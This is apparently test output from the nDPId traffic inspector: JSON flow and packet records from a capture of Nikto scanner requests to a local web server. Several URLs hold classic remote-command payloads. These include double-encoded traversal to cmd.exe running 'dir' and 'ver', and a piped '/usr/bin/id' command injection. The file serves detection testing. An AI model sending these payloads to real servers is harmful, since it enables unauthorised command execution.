+00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":1576420277898,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277898,"pkt":"AAAAAAAAAAAAAAAACABFAADwDYtAAEAGLnt\/AAABfwAAAcdwH5DXOjTMIaH3HYAYAED+5AAAAQEICp1m\/7GdZv+xR0VUIC9wYnNlcnZlci8uLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7560000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003298)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_packet_id":1,"flow_last_seen":1576420277899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277899,"pkt":"AAAAAAAAAAAAAAAACABFAADkYvBAAEAG2SF\/AAABfwAAAcdyH5AooFut2XrcJYAYAED+2AAAAQEICp1m\/7OdZv+zR0VUIC9ycGMvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01097{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003299)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7560000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_packet_id":1,"flow_last_seen":1576420277901,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277901,"pkt":"AAAAAAAAAAAAAAAACABFAADogDVAAEAGu9h\/AAABfwAAAcd0H5COI7lxOfsaCoAYAED+3AAAAQEICp1m\/7WdZv+1R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7560000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003300)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7560000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_packet_id":1,"flow_last_seen":1576420277902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277902,"pkt":"AAAAAAAAAAAAAAAACABFAADos7FAAEAGiFx\/AAABfwAAAcd2H5DBqortDeq7IYAYAED+3AAAAQEICp1m\/7adZv+2R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYyt2ZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7560000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+ver","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003301)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":1,"flow_last_seen":1576420277903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277903,"pkt":"AAAAAAAAAAAAAAAACABFAAEFC5dAAEAGMFp\/AAABfwAAAcd4H5DWdjLSA\/QqXoAYAED++QAAAQEICp1m\/7edZv+3R0VUIC9fdnRpX2Jpbi8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzMwMikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003302)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":1,"flow_last_seen":1576420277905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277905,"pkt":"AAAAAAAAAAAAAAAACABFAADdGS5AAEAGIut\/AAABfwAAAcd6H5B05SBpiRPNwoAYAED+0QAAAQEICp1m\/7mdZv+5R0VUIC9hbnMucGw\/cD0uLi8uLi8uLi8uLi8uLi91c3IvYmluL2lkfCZibGFoIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003370)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7560000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":1576420277907,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277907,"pkt":"AAAAAAAAAAAAAAAACABFAADhaxBAAEAG0QR\/AAABfwAAAcd8H5CT4lJLpEBlJ4AYAED+1QAAAQEICp1m\/7udZv+7R0VUIC9hbnMvYW5zLnBsP3A9Li4vLi4vLi4vLi4vLi4vdXNyL2Jpbi9pZHwmYmxhaCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01098{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7560000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003371)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":1576420277908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277908,"pkt":"AAAAAAAAAAAAAAAACABFAAEIG05AAEAGIKB\/AAABfwAAAcd+H5BZWCIKm5\/s0oAYAED+\/AAAAQEICp1m\/7ydZv+8R0VUIC9yZXBvcnRzL3J3c2VydmxldD9zZXJ2ZXI9cmVwc2VydityZXBvcnQ9L3RtcC9oYWNrZXIucmRmK2Rlc3R5cGU9Y2FjaGUrZGVzZm9ybWF0PVBERiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzQzNykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01132{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/reports\/rwservlet?server=repserv+report=\/tmp\/hacker.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003437)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":1576420277909,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277909,"pkt":"AAAAAAAAAAAAAAAACABFAAC9phtAAEAGlh1\/AAABfwAAAceAH5B1J59d+HsAr4AYAED+sQAAAQEICp1m\/72dZv+9R0VUIC9vcGVuLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ4KQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/open.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006448)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_packet_id":1,"flow_last_seen":1576420277910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277910,"pkt":"AAAAAAAAAAAAAAAACABFAADA+2VAAEAGQNB\/AAABfwAAAceCH5AHKcInz6YgT4AYAED+tAAAAQEICp1m\/76dZv++R0VUIC9meDI5aWQxLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id1.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006449)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":1576420277912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277912,"pkt":"AAAAAAAAAAAAAAAACABFAADAC6pAAEAGMIx\/AAABfwAAAceEH5BX8jLvG2MI1oAYAED+tAAAAQEICp1m\/8CdZv\/AR0VUIC9meDI5aWQyLnR4dCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjQ1MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
